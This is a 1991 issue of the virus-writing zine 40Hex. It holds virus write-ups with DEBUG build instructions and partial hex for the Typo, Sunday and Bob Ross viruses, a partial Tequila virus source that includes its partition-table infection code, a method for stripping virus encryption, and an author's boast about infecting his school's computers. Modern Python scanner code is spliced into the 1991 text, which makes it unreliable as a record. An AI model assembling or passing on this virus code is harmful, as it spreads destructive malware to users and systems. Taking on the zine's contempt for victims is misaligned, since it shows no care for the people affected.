40Hex Issue 4 December 1991
Index
-----
001.....................................................USA Virus News
002.................................................The Bob Ross virus
003...................................................The Sunday Virus
004...................................................The Terror Virus
005...............................................Virus Survey Article
006.................................................The Typo COM virus
007.....................................................From Johns BBS
008.................................................The Marauder Virus
009................................................Pklite Scan Strings
010...............................................Encryption Defeating
011...............................................The Ultimate Toolkit
012..............................................Tequilla Virus Source
013...................................................................
014...................................................Is This The End?
Thanks to:
Shade of Sorrow, Demogorgon, Dark Angel, Count Zero,
Piff', Paragon Dude (and the rest of Phalcon), Blade Runner,
The Fisch, Instigator, Decimator, Dr. Logic, Venom/Hate (and
all the QSD/Lutz crowd), God, Amiga Factor, all the people
from the city, and all I forgot...
40Hex Issue 4 December 1991
What's New
----------
Well a lot of things have been going on this month. Well I've been
really lazy lately and haven't gotten around to writing this issue
for over two months I guess. Well let me tell you what's been going
on.
Let me take the time now to address these lame fucking people who,
if they had 9600+ modems, would be wares puppies, but being they
have a 2400 they decide to practice their leeching habits on
viruses. They are the virus collectors, the ones who never run
the damn things, just add them to their collection and upload them
here and there to be really, as they say, "K-K00\_." Please
mother fuckers, stop. I mean look at the Red Cross virus, does
anyone have the real copy of it? Some lame ass collector found
something that scanned as Red-X and was "/> a |)" enough to upload
it everywhere. Please, give it up. Virus BBS's are a great thing,
and without them we would be lost, but by the same token these
collectors, or as someone once said, "Micro-Wares Puppies," must
get with the program or die.
Well second of all, I've been calling The Homebase quite a bit
lately and came to one conclusion, people are dumb. Look in this
issue for some scroll backs of stupid things people have posted on
that BBS this month or so.
The Bob Ross virus has been released in the mist, so watch what you
D/L. Hmmmm, I think SCAN 85 caught it, but that will change soon,
right DA?
Funny story. I infected my school's computer with several viruses
before I transferred out. Well what I heard happened from that is
this. They somehow could not get the viruses to disappear no
matter what they did. Incidentally it was Whale and some other
viruses. Anyway, out of the frustration of the viruses reappearing
all the time, they decided to go out and get rid of all the hard
drives. So they removed all the hard drives from all the systems
and put them in storage. Anyway, they finally got a virus expert
to come in, he said that they didn't have to get rid of the hard
drives he can rid the viruses. Well too late. The art department
had got a hold of them and welded them together into one big
statue! Thousands of dollars worth of hardware down the drain.
The school was so embarrassed at the whole thing they shipped the
statue way out of state so everybody would soon forget this
screwup. Thanks to Shade of Sorrow for finding that one out for
me.
SCAN 85 _is_ out, 'nuff said.
Bet you all heard the story about Novell and Stoned III? If not
this is the run down. Novell got infected by Stoned III. Novell
distributed infected copies of the December update to everyone.
That's the story.
40Hex Issue 4 December 1991
The Bob Ross Virus
This is the infamous Bob Ross virus by Dark Angel of Phalcon/Skism.
Here's a bit from the author first.
The Funky Bob Ross Virus Version 1.0
Written by Dark Angel / 26 September 1991 / (c) 1991
PHALCON/SKISM Co-op
Effective length: 1125, Resident length: 672 bytes
DEDICATION:
This virus was written expressly to
1) Piss off Patty Hoffman, John McAfee, Ross Greenberg, and all the
other guru-wanna-bes in this world.
2) Spread the message of The Almighty Bob, and so enrich the lives
of people all over the world.
3) Show off (Now I can tell people that I wrote a virus!)
WHAT THIS IS:
This is a self-encrypting, non-overwriting COM infector. It doesn't do
anything to EXE files. File sizes increase by 1117 bytes. It goes off
on July 9th of any year or after 7 infection "waves."
WHAT IT DOES WHEN IT GOES OFF:
The virus goes memory resident and prints out a Bobism every 5 minutes.
It then enters a delay loop for approximately 5 seconds, allowing for a
brief moment of silence while the victim reads Bob's holy message. The
virus will not destroy anything. The virus will not go TSR if it finds
another copy of itself in memory.
Well, here it is, the hex dump, by now you should know how to compile
it from the hex dump.
--------------------------------------------------------------------------------
The virus itself is only 1125 bytes, this file is 3125 to account for an
infected file.
Scan 85 detects it as the [Beta] virus, but strain-b will be out soon.
40Hex Issue 4 December 1991
The Sunday Virus
According to Patty Hoffman, the Sunday virus is based on the
Jerusalem viruses, because the codes for both viruses are similar.
Sunday infects COM, EXE, and OVL files, when they are executed, and it
stays resident in memory. It was circulated around the Seattle,
Washington area in 1989, and is quite common. Sunday can be picked up
by almost every scanner out there. The SCAN ID code for this virus
is "CD 21 80 FC 04 75 10" in lines 01E0 and 01F0.
This version of Sunday doesn't seem to print any messages on
the screen, however, some versions do, every Sunday. This virus
spreads rapidly, and replicates quite well.
To create SUNDAY.COM, cut out the following code, and name the
resulting file sunday.txt. Then, use this command: DEBUG < SUNDAY.TXT
--DecimatoR
------------------------------------------------------------------------------
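The scan string quoted in the Sunday article above can be checked against a file with a small byte-signature scanner. This is an added example, not part of the original issue: it streams the input in chunks, catches matches that straddle a chunk boundary, and maps each hit to the 16-byte DEBUG dump rows it touches (a .COM image loads at offset 0100h). The sample image is constructed (zero filler with the scan string planted at an assumed offset) and all function names are hypothetical.

```python
import io

# Scan string quoted in the article for the Sunday virus.
SUNDAY_SCAN_STRING = bytes.fromhex("CD 21 80 FC 04 75 10")

# DOS loads a .COM image at offset 0100h, so DEBUG shows file offset N
# at address N + 0100h.
COM_LOAD_ADDRESS = 0x100


def scan_stream(stream, signature, chunk_size=4096):
    """Yield every file offset at which `signature` occurs in `stream`.

    The last len(signature) - 1 bytes of each window are carried into the
    next one, so a match split across two reads is still found, and no
    match is ever reported twice.
    """
    if not signature:
        raise ValueError("empty signature")
    overlap = len(signature) - 1
    tail = b""
    base = 0  # file offset of the first byte of `tail`
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        window = tail + chunk
        pos = window.find(signature)
        while pos != -1:
            yield base + pos
            pos = window.find(signature, pos + 1)
        keep = window[-overlap:] if overlap else b""
        base += len(window) - len(keep)
        tail = keep


def scan_bytes(data, signature=SUNDAY_SCAN_STRING, chunk_size=4096):
    """Convenience wrapper: scan an in-memory buffer, return a list."""
    return list(scan_stream(io.BytesIO(data), signature, chunk_size))


def debug_rows(offset, length, load_address=COM_LOAD_ADDRESS):
    """Return the 16-byte DEBUG dump row addresses a match touches."""
    first = (load_address + offset) & ~0xF
    last = (load_address + offset + length - 1) & ~0xF
    return list(range(first, last + 1, 16))


def scan_report(data, signature=SUNDAY_SCAN_STRING, chunk_size=4096):
    """Return (file_offset, load_address, dump_rows) for every match."""
    return [
        (off, COM_LOAD_ADDRESS + off, debug_rows(off, len(signature)))
        for off in scan_bytes(data, signature, chunk_size)
    ]


def build_sample(match_offset=0xED, size=0x200):
    """Constructed test image: zero filler, scan string planted once.

    The offset is an assumption chosen so the match spans two dump rows,
    as the article describes.
    """
    image = bytearray(size)
    end = match_offset + len(SUNDAY_SCAN_STRING)
    image[match_offset:end] = SUNDAY_SCAN_STRING
    return bytes(image)


if __name__ == "__main__":
    # A tiny chunk size forces the match to straddle a read boundary.
    for off, addr, rows in scan_report(build_sample(), chunk_size=16):
        row_text = ", ".join(f"{r:04X}" for r in rows)
        print(f"match at file offset {off:#06x} "
              f"(DEBUG address {addr:04X}, rows {row_text})")
```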
40Hex Issue 4 December 1991
Terror
------
Duh, just as I was about to release this issue I found that I forgot
to make an article 4. So here it is.
-------------------------------------------------------------------------------
40Hex Issue 4 December 1991
"No feelings of what I left behind, no guilt for the victims of my
crime. No compassion, just a burning deep inside. No pain... I'm here
just to die... " - Sub Zero
This article is from the 11/26/91 morning final of the San Jose Mercury News
**text written like this is my comments**
SURVEY DEFLATES COMPUTER-VIRUS DANGERS
But safeguards are few as cases proliferate.
Computer viruses, those nasty bits of destructive programming unleashed
by deviant hackers, are multiplying at a startling rate - but haven't
proved nearly as troublesome as once feared and aren't scaring users
enough to take even simple safeguards.
Dataquest Inc., a market research firm in San Jose, released a
groundbreaking 150-page survey Monday showing that almost two-thirds of
business and government organizations with more than 300 personal
computers have encountered a virus at least once this year. Yet only 15
percent of them have installed anti-virus software.
What's more, Dataquest found the virus encounters more than doubled
in each of the first three quarters of 1991. **<smile, smile>**
The National Computer Security Association of Washington D.C., which
represents 1,000 developers of anti-virus software, hired Dataquest to
conduct what is apparently the first study of virus proliferation by a
reseacher not directly employed by an anti-virus software company.
Computer viruses hide themselves in legitamate files, jumping from
machine to machine. Triggered either at random or on a set date, such
as Friday the 13th, the most destructive viruses gobble up programs and
data in their host computers. **gobble???**
Robert Morris, then a student at Cornell University, unleashed a
the biggest virus to date in November 1988 **please** when a program he
intended to queitly slip onto a network call Internet went out of
control and temporally shut down 6,000 computers at universitys and
government reaserch labrotorys nationwide. In the wake of the Internet
case, there were dire predictions of future virus attacks the could
bring the entire economy grinding to a halt.
But there haven't been any major virus outbreaks since then and, it
turnded out, the Internet virus **Internet worm, damn it!!!** did little
permanent damage.
What's more, most viruses are relitavely mild - more like a case of
sniffles the double pnemonia. Typically, these mild viruses take up
space in the computers memory and slow down operations, but don't
destroy data. ** :) :( **
"Many viruses are very innocuous," said Shella Cotter, director of
software consulting for Dataquest. "You find them, you identify them and
you get rid of them."
"Many of the viruses I've heard about have not been big problems,"
added Jay BloomBecker ** tell me he aint gay **, director of the
National Center for Computer Crime Data in Santa Cruz. "But it's
significant enough that if you're not paying attention to it, you
security is probably inadeqaute."
Anti-virus software sold over the counter automatcally plucks out
the most of the roughly, 1,000 viruses identifey thoughout the world.
Occasoinally however, killer viruses can take over an entire computer
system and threaten a buisness with massive losses of crucial
information.
Dataquest talked to 600 orginazations during October and dicovered
that 63 percent had encountered at least one virussince the beginning of
the year. Of these reporting and encounter, 62 percent claimed "a
definite loss of productivity," although the $70,000 study did not
tabulate the total cost.
In the survey group, 9 percent reported a "virus disaster," defined
as a single incedent affecting 25 or more personal computers or
diskettes. On average, computers involved in a virus disaster were out
of commision four days and required reprogramming at a cost of $6,200.
And, in 3 percent of virus attacks, either the person who introduced
the virus or the person responible for computer security was threatened
with dismmisal. Dataquest didn't count how many were actually fired.
"Computer viruses are much more prevalent than people think and,
unless we think, and unless we take precautions, over time they are
going to get worse," said Andrew Seybold, head of the Dataquest servey
team.
But anti-virus software and strict enforcement of computer scurity
policies could change in the future.
"The good news is, it's solveable. The bad news is companies aren't
chossing to solve it,", Cotter concluded. ** The other way around for
us **
40Hex Issue 4 December 1991
The Typo COM Virus
The Typo Virus comes in 2 forms - a boot sector infector, and a
COM file infector. This version is the COM version. The effective
length of the virus is 867 bytes, and it only infects COM files. Typo
stays resident, and can infect files whether they are run or not, from my
experience. Typo isn't a destructive virus, but it does garble any
output to the parallel ports, by exchanging certain letters with others
that sound similar, and by transposing numbers. Sometimes it replaces
one number with an entirely different number. Typo is believed to have
originated in Israel, because some Hebrew letters are changed when it is
active, and it was isolated in that country. Typo is easily detected by
SCAN, and the scan string is "A1 58 00 2E 89 84 99 FE 26 A1 5A 00" in lines
400 and 410 of the hex dump, below.
To assemble TYPO.COM, cut out the following hex, and name the resulting
file TYPO. Then, issue the command DEBUG < TYPO and you will have a
working version of the virus.
--DecimatoR
----------------------------Cut Here------------------------------
e 0400 A1 86 00 2E 89 44 8E 26 A1 58 00 2E 89 84 99 FE
e 0410 26 A1 5A 00 2E 89 84 9B FE 26 A1 80 00 2E 89 44
--------------------------Cut Here Too-----------------------------
Notice to all: 40Hex is always looking for new viruses to do write ups
on, and new source code to distribute. If you have a copy of a rare
virus, and/or viral source code, please send it to Digital Warfare BBS,
at 717-367-3501. We'll be happy to give you the credit for donating it -
IF you want us to. ;)
---Dec
40Hex Issue 4 December 1991
How Lame Are These People?
-------------------------
This text is from the Homebase BBS, McAfee's board; all I can say is
read it. Special appearance from Data Disruptor of Rabid and
Lestat/Skism, AKA me... Read on...
Msg#: 5712 *viru*
11-19-91 17:11:34
From: TERRY ROSS
To: ALL
Subj: IS THIS A VIRUS?
Hi. Is there a known virus which displays a screen which reads "INC, for
quality cracks?" I have recently inherited a computer at the company I work at
and there was apparently some tetris and blockout games on the disk which are
the source of this message. I found a file called "runme.bat" with the text in
it, but even after I deleted it, it still pops up the aforementioned message.
Also, the message gives me a choice of EGA CGA or monochrome and in general,
the message makes life difficult for me.
any help with this would be vastly appreciated.
<*>Replies
<A>gain, <R>eply, <N>ext, or <S>top?
Msg has replies, read now(Y/N)? y
Msg#: 5715 *viru*
11-19-91 17:50:59
From: ARYEH GORETSKY
To: TERRY ROSS
Subj: REPLY TO MSG# 5712 (IS THIS A VIRUS?)
If you can upload a copy of an infected file, we can see if it contains viral
code.
Aryeh Goretsky
Tech Support
<->, <A>gain, <R>eply, <N>ext, or <S>top? N
-- The below text was deleted by Aryeh, I don't think he likes me --
Msg#: 5718 *viru*
11-19-91 19:42:34
From: LESTAT /SKISM
To: TERRY ROSS
Subj: REPLY TO MSG# 5712 (IS THIS A VIRUS?)
It's not a virus. INC is the International Network of Crackers. What they do
is unprotect games and distribute them. What you do have is most likely
illegally obtained software.
<->, <D>elete, <A>gain, <R>eply, <N>ext, or <S>top?
End of Replies, add yours(Y/N)? N
Msg#: 5717 *viru*
11-19-91 18:01:25
From: DATA DISRUPTOR
To: ARYEH GORETSKY
Subj: REPLY TO MSG# 5597 (RABID)
Haha! Funny guy. I believe you are referring to the Roland D-10 and S-10
series of keyboards... R-10 being a keyboard... bah!
Data Disruptor RABID Int'nl Development Corp.
<*>Replies
<->, <A>gain, <R>eply, <N>ext, or <S>top?
Msg has replies, read now(Y/N)? y
-- Again I was deleted, come on Aryeh old buddy --
Msg#: 5719 *viru*
11-19-91 19:45:03
From: LESTAT /SKISM
To: DATA DISRUPTOR
Subj: REPLY TO MSG# 5717 (RABID)
That's coming from a guy who thinks INC are virus writers. Jeesh.
<->, <D>elete, <A>gain, <R>eply, <N>ext, or <S>top?
End of Replies, add yours(Y/N)? N
40Hex Issue 4 December 1991
"I take my boys everywhere I go, cause I'm paranoid..."
The Marauder Virus
------------------
December marks the first year of the group Skism. The alliance of
Phalcon/Skism took place around July 1991. Me and a few friends at
school started the group by hacking old viruses into new strains.
Well I have lost contact with these people since then and a new
breed of members has risen from the ashes.
Well, I myself have learned a lot over the year. I went from virus
hacker with about three viruses to my name, to overwriting man,
to what I am now. An advanced (kind of) level assembler programmer,
writing parasitic infectors. Well come this time next year I believe
I'll be into more major stuff, ya know sick mother fucking DIR-2
type action. I've written a couple of TSR virus shells, nothing
completed yet. Well anyway here's my personal latest creation -
Marauder. What Marauder is, is this ----
Marauder Virus
By Hellraiser
of Phalcon/Skism
Aliases: Deadpool-B, 808-B, 860.
Marauder is a non-overwriting, non-resident, encrypting, semi-mutating,
.COM file infector.
When a file is infected with the Marauder Virus the virus will search
the current path for a .COM file and infect it, adding 860 bytes to the
file's size. If no .COM files reside in the current directory, the
virus will go up one directory and check for .COM files to infect until
it reaches the root. At the root directory the virus will scan for
other directories to find .COM files, until one uninfected .COM file is
found. If no .COM files are found on the disk the virus will terminate
its search and return to the currently running program.
If an infected file is run on February second of any year, the virus
will destroy all files in the current directory, by overwriting them
with message code. The files will not run when executed, just terminate
upon reading the first line. There is no way to recover the files once
the virus destroys them. After this control will be given back to the
host program.
The Marauder virus is able to infect any .COM file no matter what
attribute... Hidden, System, Read-Only, etc... The file's date, time, and
attribute will not be changed after a file becomes infected.
The virus will not cause a system error if run on a write-protected
floppy or fixed-disk, merely terminate any attempt of infection.
The virus will not infect files under 16 bytes or over 64,675 bytes.
For the most part the virus is randomly encrypted with each passing
infection; the small part of the program code which is not encrypted
mutates between two different, but compatible strains of bytes.
There is no way of detecting the virus infections other than the
addition of 860 bytes to infected files, in other words, system run-time
is not affected at all. If any run-time is affected it is the split
second it takes for the virus to infect a file.
The virus causes no damage to disk sectors or boot records etc... The
only permanent damage is the destruction of all files in the current
directory on 02/02/XX.
And here it is...
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
40Hex Issue 4 December 1991
Hacked Pklite File Scanning
---------------------------
In issue two, I believe it was, I released a method of making Pklite
files un-uncompressable and un-detectable. Well seems a few people
used the trick for wrong doing. What do I mean by wrong doing you
ask? Well let's just say lame trojans and such.
Anyway, I had a few sysops on my ass about the trick and so, so now I
must release.... The hacked Pklite scanning strings. Well I
could really give a fuck if someone's BBS gets crashed, but then again
I am friends with a lot of sysops. And besides I have a new trick
anyway :)
Well there are two strings. One for .EXE files and one for .COM
files. And here they are.
-----------------------------------------------------------------------
"01 F0 FF 50 00 00 00 03 01" Pklite EXE
"53 33 DB 53 CB 03 01" Pklite COM
------------------------------------------------------------------------
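The scan strings above, together with the Typo string quoted in the Typo article, can be checked against a file with a short byte-signature scanner. This is an added example, not code from 40Hex; the function names, the chunked-read design and the sample buffer are constructed for illustration.

```python
"""Byte-signature scan using the scan strings printed in this issue (added example)."""
import io

# Scan strings exactly as printed on the page.
SIGNATURES = {
    "Typo COM virus": "A1 58 00 2E 89 84 99 FE 26 A1 5A 00",
    "Hacked Pklite EXE": "01 F0 FF 50 00 00 00 03 01",
    "Hacked Pklite COM": "53 33 DB 53 CB 03 01",
}


def parse_scan_string(text):
    """Turn a printed string such as 'A1 58 00' into raw bytes."""
    return bytes.fromhex(text)  # fromhex skips the spaces


def scan_stream(stream, signatures=SIGNATURES, chunk_size=64 * 1024):
    """Return sorted (file_offset, name) hits for a binary stream.

    The stream is read in chunks. The last (longest_pattern - 1) bytes of
    each window are carried into the next one, so a signature that
    straddles a chunk boundary is still found.
    """
    patterns = {name: parse_scan_string(t) for name, t in signatures.items()}
    overlap = max(len(p) for p in patterns.values()) - 1
    hits = set()          # a set, because the overlap can re-find a hit
    tail = b""
    base = 0              # file offset of the first byte of the window
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        window = tail + chunk
        for name, pattern in patterns.items():
            start = window.find(pattern)
            while start != -1:
                hits.add((base + start, name))
                start = window.find(pattern, start + 1)
        keep = min(overlap, len(window))
        tail = window[len(window) - keep:]
        base += len(window) - keep
    return sorted(hits)


def scan_bytes(data, chunk_size=64 * 1024):
    """Scan an in-memory buffer with the same chunked logic."""
    return scan_stream(io.BytesIO(data), chunk_size=chunk_size)


def scan_file(path):
    """Scan a file on disk."""
    with open(path, "rb") as handle:
        return scan_stream(handle)


# Constructed sample buffer: filler bytes with two of the scan strings
# planted at offsets 37 and 94. It is not a real infected file.
SAMPLE = (
    b"\x90" * 37
    + parse_scan_string(SIGNATURES["Hacked Pklite COM"])
    + b"\x00" * 50
    + parse_scan_string(SIGNATURES["Typo COM virus"])
    + b"\x00" * 9
)

if __name__ == "__main__":
    # A 16-byte chunk size forces the Typo string across a chunk boundary.
    for offset, name in scan_bytes(SAMPLE, chunk_size=16):
        print(f"{offset:#06x}  {name}")
```

A hit on one of the Pklite strings only says the file was packed with the modified header; it says nothing about what the packed program does.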
What's my new trick??? Well I won't reveal it at this point... But here
is another compression trick. It lets you compress a file with Pklite
then again with LZExe.
First
-----
Compress the file with Pklite
Next
----
Compress the file with LZExe
It won't let you 'cause the file becomes bigger...
But
---
Use the DOS Undelete function to undelete the file ?zexe.tmp. That's the
twice compressed file. Rename it to what you want. Destroy the LZ
header... And there you have it...
40Hex Issue 4 December 1991
A Further Look Into Cracking Encrypted Viruses
---------------------------------------------
In Censor #1, Rabid's Data Disruptor showed a way to decrypt
encrypted viruses. The only problem with the method shown is that
once you decrypt the virus, it cannot be run without modification.
I wish to take his theory a little farther, with a different
approach.
There is a really simple way around the problem. What you will
need is a debugger. I prefer Turbo Debugger, by Borland. However
if you are good at the DOS utility Debug, you may be able to follow
along.
The routine to unencrypt is simple, really simple. What you will
need to do is make a small target file for the virus to infect. A
100 byte or less file is preferred.
Step One
--------
Copy the target file to a different filename to make two copies of
the file. Example - COPY TARGET.COM DUDE.COM
Step Two
--------
Infect one of the files, however the virus infects the file.
Remember just infect one of the files.
Step Three
----------
Load up your debugger (I'm gonna give Turbo Debugger steps, so people
with Debug and the Microsoft Debugger will have to improvise) and
get ready to single step through the virus.
Step Four
---------
Start single stepping through the virus. If the virus is encrypted
you will hit a loop somewhere near the beginning of the code. In
most cases this is an XOR loop. It will look something like this...
add si, [1234] ;
mov di, si ;
mov cx, 0123 ; this would be the virus size to unencrypt
* mov ah, [0105] ; this is the encryption value's offset or the
; actual encryption value if no brackets are
; around it
cld ; clear direction flag so si and di auto increment
lodsb ; load byte from si position into al
xor al, ah ; xor the loaded byte with the encryption value
stosb ; store it at di (same as si)
loop 0110 ; loop until cx=0 NOTE: 0110 will be an offset
ret ; return when done
Where the "*" is, will be either the location of the encryption
value, or the actual encryption value if no brackets are around it.
If there are no brackets, keep that number in mind. Otherwise write
the offset down.
Step Five
---------
When the encryption procedure is done the virus is then unencrypted.
If you were to write the virus to disk now, it would not run. Because
as soon as the virus runs it encrypts itself and then jumps into the
encrypted code.
Follow the program to the part where the virus is about to write the
virus to the host program. It will again call on the encryption
routine.
* Here it is again, but this time, before it XORs anything load the
encryption value with 0's. If it is a byte value load it with 00,
if it is a word value load it with 0000 as in...
add si, [1234] ;
mov di, si ;
mov cx, 0123 ; this would be the virus size to unencrypt
* mov ah, 00 ; change the encryption value to zero, thus the
; encryption will not take place at all. Instead
; the virus will produce an original strain.
cld ; clear direction flag so si and di auto increment
lodsb ; load byte from si position into al
xor al, ah ; xor with zero leaves the byte unchanged
stosb ; store it at di (same as si)
loop 0110 ; loop until cx=0 NOTE: 0110 will be an offset
ret ; return when done
Now run the program at full speed. The next file the virus infects
will be unencrypted, and executable.
NOTE: This method will work only for the types of viruses that use
this type of encryption. Mainly non-resident .COM and .EXE
infectors. In other words, don't go thinking this trick will work
on Whale or anything.
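The same weakness can be used for detection without running anything. The added example below (not from 40Hex; all names and the sample data are constructed) models the byte-wise XOR loop and does an "x-ray" scan: it finds a known byte sequence inside a body encrypted with any constant one-byte key, and recovers the key. It goes beyond the article's debugger procedure by working statically on a buffer.

```python
"""X-ray scan through a constant single-byte XOR (added example)."""


def xor_loop(buf, key):
    """Model of the lodsb / xor / stosb loop: each byte XORed with one key byte."""
    return bytes(b ^ key for b in buf)


def _adjacent_xor(buf):
    # (p[i] ^ k) ^ (p[i+1] ^ k) == p[i] ^ p[i+1]: XORing neighbouring bytes
    # cancels a constant key, so this sequence is the same for the plain
    # and the encrypted form of the same bytes.
    return bytes(a ^ b for a, b in zip(buf, buf[1:]))


def xray_find(data, signature):
    """Return [(offset, key), ...] for every place where `signature`
    occurs in `data` XORed with a constant key byte (key 0 = unencrypted)."""
    if len(signature) < 2:
        raise ValueError("signature must be at least 2 bytes long")
    needle = _adjacent_xor(signature)
    haystack = _adjacent_xor(data)
    hits = []
    start = haystack.find(needle)
    while start != -1:
        # The key falls out of any one matching byte pair.
        hits.append((start, data[start] ^ signature[0]))
        start = haystack.find(needle, start + 1)
    return hits


def decrypt_body(data, body_start, signature):
    """Decrypt data[body_start:] with the key recovered by the x-ray scan.
    Returns None if the signature is not present under any key."""
    hits = xray_find(data[body_start:], signature)
    if not hits:
        return None
    _, key = hits[0]
    return xor_loop(data[body_start:], key)


# Constructed sample, not a real virus: a 4-byte clear "stub" followed by
# a body that contains a marker and is XORed with the key 0x5A.
MARKER = b"CONSTRUCTED-SAMPLE-MARKER"
PLAIN_BODY = b"\x00" * 20 + MARKER + b"\xff" * 10
SAMPLE_KEY = 0x5A
ENCRYPTED = b"STUB" + xor_loop(PLAIN_BODY, SAMPLE_KEY)

if __name__ == "__main__":
    print("plain search finds marker:", MARKER in ENCRYPTED)
    for offset, key in xray_find(ENCRYPTED, MARKER):
        print(f"marker at offset {offset}, key {key:#04x}")
    # Key 0 is the identity, which is why zeroing the key in the
    # debugger makes the loop write an unencrypted copy.
    print("key 0 leaves body unchanged:", xor_loop(PLAIN_BODY, 0) == PLAIN_BODY)
```

As the note above says for the debugger method, this only covers a fixed one-byte XOR; a word-sized or changing key needs a different invariant.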
40Hex Issue 4 December 1991
The Ultimate Virus Programmers Toolkit
--------------------------------------
Just thought it would be funny to list what I think is the ultimate
virus programmers toolkit. Theories may vary.
- Turbo Assembler (MASM sucks, and it is slow)
- Turbo Debugger (It rules, what else can I say?)
- Quick Edit (Small, Fast and Turbo-like keys)
- Sourcer 486 (The ONLY real disassembler out)
- Virus Scan by McAfee Assoc. (It really is a great tool)
- VSUM (Patti Hoffman is a stupid bitch, but I must admit, this
  program is the virus underground bible)
- VSAFE from Central Point Anti-Virus (Not as annoying as Flu-Shot)
- Pklite Professional (If you don't have it - get it)
- Norton 6.0 (Diskedit alone is worth the d/l time)
- Pc-Backup by Central Point (we all fuck up sooner or later)
- MEMWALK.EXE (great shareware program, like diskedit for memory)
- Teledisk (for boot block virus saves)
- Trunc - by Skism Programming (Electronic file shredder)
- Microsoft Press Quick Reference Series
    - DOS Functions (INT 20 - 26)
    - ROM and BIOS functions (INT 10, 15 - 16)
    - MS DOS extensions (Expanded, extended memory interrupts)
- _Undocumented DOS_ or any current text file on the subject
- 40HEX magazine (Well I do have good stuff here, sometimes)
- Dark Angel's Phunky Virus writing guide (pretty hard to come by.
  He explains stuff well)
- The following source code
    - Leprosy-B (beginners only on this one, none-the-less)
    - Cancer (well documented, intermediate)
    - Tiny-F (not bad intro to .COM infections)
    - Dark Avenger (well available and excellent tips on .EXE
      infection)
    - Stoned II (boot block intro)
    - Secure 2.0 (I got the source to this. It is a virus
      detection system from the guy who wrote
      1260, Mark Washburn. The source has some
      great examples on debug trapping, TSR
      skills, and encryption)
    - IBM Scan source (I have this too, it's funny... Kinda
      like McAfee's SCAN but lamer. By
      David Chess)
- An account on the Bulgarian Virus Exchange +359-220-4198
- An account on a BBS with Fido-Net's virus echo (keep track of your
  latest score)
- Many accounts on the Homebase BBS (408) 988-4004 2400 bps
                                    (408) 988-5138 HST 9600
                                    (408) 988-5190 v32 9600
  (Tell Aryeh I sent ya')
- Scientific Calculator (Hex ain't easy)
- Vivaren (Helps you break night, or any other controlled substance)
- Food, smokes, or whatever your vice is...
That'll do it...
40Hex Issue 4 December 1991
The Tequila Virus Source
-------------------------
Nuff' said.
-------------------------------------------------------------------------------
;=============================
; the tequila virus =
; a recompilable =
; dis-assembly =
; specifically designed =
; for assembly to a COM file =
; with the A86 assembler. =
; ++++++++++++++++++ =
; If you desire a "perfect" =
; byte for byte source code =
;match-up, the MASM assembler=
; must be used and the noted =
;instructions must be changed=
; to comply with MASM syntax.=
; In addition, all byte and =
;word pointer references must=
; be changed from B and W to =
; BYTE POINTER and WORD =
; POINTER. =
;=============================
CODE_SEG SEGMENT
ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG
ORG 0100
TEQUILA PROC NEAR
JMP START
DB 000, 000, 000, 000, 000, 000, 000, 0FFH, 0FFH
DB 009, 005, 001H, 010H, 000, 000, 002H, 0FAH, 000, 00CH
DB 00DH, 00AH, 00DH, 00AH
DB "Welcome to T.TEQUILA's latest production.", 00DH, 00AH
DB "Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/"
DB "Switzerland.", 00DH, 00AH
DB "Loving thoughts to L.I.N.D.A", 00DH, 00AH, 00DH, 00AH
DB "BEER and TEQUILA forever !", 00DH, 00AH, 00DH, 00AH
DB "$"
DB "Execute: mov ax, FE03 / int 21. Key to go on!"
PROGRAM_TERMINATION_ROUTINE:
PUSH BP
MOV BP,SP
SUB SP,0CH
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
PUSH DS
PUSH CS
POP DS
MOV AX,W[6]
INC AX
JE 0243H ;Masm Mod. Needed
DEC AX
JNE 020DH ;Masm Mod. Needed
DEC W[8] ;Masm Mod. Needed
JNE 0243H ;Masm Mod. Needed
JMP 0246H ;Masm Mod. Needed
MOV AH,02AH
CALL INT_21
MOV SI,CX
MOV CX,W[8]
CMP CL,DL
JNE 022FH ;Masm Mod. Needed
MOV AX,SI
SUB AX,W[6]
MUL B[011H] ;Masm Mod. Needed
ADD AL,DH
ADD CH,3
CMP AL,CH
JAE 0237H ;Masm Mod. Needed
MOV W[6],0FFFFH ;Masm Mod. Needed
JMP 0243H ;Masm Mod. Needed
MOV W[6],0 ;Masm Mod. Needed
MOV W[8],3 ;Masm Mod. Needed
JMP 02DF ;Masm Mod. Needed
MOV BX,0B800H
INT 011
AND AX,030H
CMP AX,030H
JNE 0256H ;Masm Mod. Needed
MOV BX,0B000H
MOV ES,BX
XOR BX,BX
MOV DI,0FD8FH
MOV SI,0FC18H
MOV W[BP-2],SI
MOV W[BP-4],DI
MOV CX,01E
MOV AX,W[BP-2]
IMUL AX
MOV W[BP-8],AX
MOV W[BP-6],DX
MOV AX,W[BP-4]
IMUL AX
MOV W[BP-0C],AX
MOV W[BP-0A],DX
ADD AX,W[BP-8]
ADC DX,W[BP-6]
CMP DX,0F
JAE 02B0 ;Masm Mod. Needed
MOV AX,W[BP-2]
IMUL W[BP-4]
IDIV W[0F] ;Masm Mod. Needed
ADD AX,DI
MOV W[BP-4],AX
MOV AX,W[BP-8]
MOV DX,W[BP-6]
SUB AX,W[BP-0C]
SBB DX,W[BP-0A]
IDIV W[0D] ;Masm Mod. Needed
ADD AX,SI
MOV W[BP-2],AX
LOOP 0269 ;Masm Mod. Needed
INC CX
SHR CL,1
MOV CH,CL
MOV CL,0DB
ES MOV W[BX],CX ;Masm Mod. Needed
INC BX
INC BX
ADD SI,012
CMP SI,01B8
JL 0260 ;Masm Mod. Needed
ADD DI,034
CMP DI,02A3
JL 025D ;Masm Mod. Needed
XOR DI,DI
MOV SI,0BB
MOV CX,02D
CLD
MOVSB
INC DI
LOOP 02D7 ;Masm Mod. Needed
XOR AX,AX
INT 016
POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
MOV SP,BP
POP BP
RET
PRINT_MESSAGE:
PUSH DX
PUSH DS
PUSH CS
POP DS
MOV AH,9
MOV DX,012
CALL INT_21
POP DS
POP DX
RET
NEW_PARTITION_TABLE:
CLI
XOR BX,BX
MOV DS,BX
MOV SS,BX
MOV SP,07C00
STI
XOR DI,DI
SUB W[0413],3 ;Masm Mod. Needed
INT 012
MOV CL,6
SHL AX,CL
MOV ES,AX
PUSH ES
MOV AX,022A
PUSH AX
MOV AX,0205
